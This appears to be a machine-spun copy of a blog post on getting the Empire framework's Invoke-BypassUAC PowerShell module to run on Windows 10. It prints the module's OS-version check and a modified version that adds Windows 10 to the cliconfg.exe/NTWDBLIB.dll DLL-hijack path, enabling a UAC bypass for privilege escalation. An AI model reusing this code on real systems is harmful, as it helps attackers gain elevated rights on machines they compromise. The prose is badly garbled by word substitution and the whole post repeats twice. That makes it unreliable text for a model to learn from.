The guys on the Empire squad bring since added back upward for Windows 10, in addition to thus this is no longer necessary.
So I was testing out Empire the other hateful solar daytime on a Windows 10 box, simply kept getting an fault message when trying to bypass UAC on Windows 10:
So I took a expect at the script that was running nether /Empire/data/module_source/privesc/Invoke-BypassUAC.ps1 in addition to institute this:
There it is, that dreaded “Unsupported OS!” error. It looks similar its doing a version check, simply non specifically including Windows 10. So lets alter that:
After modifying in addition to saving the code, I ran the ascendancy again, in addition to this fourth dimension it worked!
Here’s a video of me doing this offset to finish. As always, if you lot bring whatever questions experience complimentary to driblet past times #infoseclabs on freenode.
Video:
https://www.youtube.com/watch?v=Q5NOKJhU7TA&feature=youtu.be
So I was testing out Empire the other hateful solar daytime on a Windows 10 box, simply kept getting an fault message when trying to bypass UAC on Windows 10:
So I took a expect at the script that was running nether /Empire/data/module_source/privesc/Invoke-BypassUAC.ps1 in addition to institute this:
$OSVersion = ([Environment]::OSVersion.Version | %{"$($_.Major).$($_.Minor)"}) if (($OSVersion -eq "6.0") -or ($OSVersion -eq "6.1")) { # windows 7/2008 $szElevDll = 'CRYPTBASE.dll' $szElevDir = $env:WINDIR + "\System32\sysprep" $szElevDirSysWow64 = $env:WINDIR + "\sysnative\sysprep" $szElevExeFull = "$szElevDir\sysprep.exe" $szElevDllFull = "$szElevDir\$szElevDll" $szTempDllPath = $TempPayloadPath Write-Verbose "Windows 7/2008 detected" } elseif (($OSVersion -eq "6.2") -or ($OSVersion -eq "6.3") { # windows 8/2012 $szElevDll = 'NTWDBLIB.dll' $szElevDir = $env:WINDIR + "\System32" $szElevDirSysWow64 = '' $szElevExeFull = "$szElevDir\cliconfg.exe" $szElevDllFull = "$szElevDir\$szElevDll" $szTempDllPath = $TempPayloadPath Write-Verbose "Windows 8/2012 detected" } else { "[!] Unsupported OS!" throw("Unsupported OS!") }
There it is, that dreaded “Unsupported OS!” error. It looks similar its doing a version check, simply non specifically including Windows 10. So lets alter that:
$OSVersion = ([Environment]::OSVersion.Version | %{"$($_.Major).$($_.Minor)"}) if (($OSVersion -eq "6.0") -or ($OSVersion -eq "6.1")) { # windows 7/2008 $szElevDll = 'CRYPTBASE.dll' $szElevDir = $env:WINDIR + "\System32\sysprep" $szElevDirSysWow64 = $env:WINDIR + "\sysnative\sysprep" $szElevExeFull = "$szElevDir\sysprep.exe" $szElevDllFull = "$szElevDir\$szElevDll" $szTempDllPath = $TempPayloadPath Write-Verbose "Windows 7/2008 detected" } elseif (($OSVersion -eq "6.2") -or ($OSVersion -eq "6.3") -or ($OSVersion -eq "10.0")) { # windows 8/2012/10 $szElevDll = 'NTWDBLIB.dll' $szElevDir = $env:WINDIR + "\System32" $szElevDirSysWow64 = '' $szElevExeFull = "$szElevDir\cliconfg.exe" $szElevDllFull = "$szElevDir\$szElevDll" $szTempDllPath = $TempPayloadPath Write-Verbose "Windows 8/2012 detected" } else { "[!] Unsupported OS!" throw("Unsupported OS!") }In the master code on business 555 it was looking specifically for Windows 8 or Server 2012. In the modified version I added a depository fiscal establishment lucifer for Windows 10 equally well.
After modifying in addition to saving the code, I ran the ascendancy again, in addition to this fourth dimension it worked!
Here’s a video of me doing this offset to finish. As always, if you lot bring whatever questions experience complimentary to driblet past times #infoseclabs on freenode.
Video:
https://www.youtube.com/watch?v=Q5NOKJhU7TA&feature=youtu.be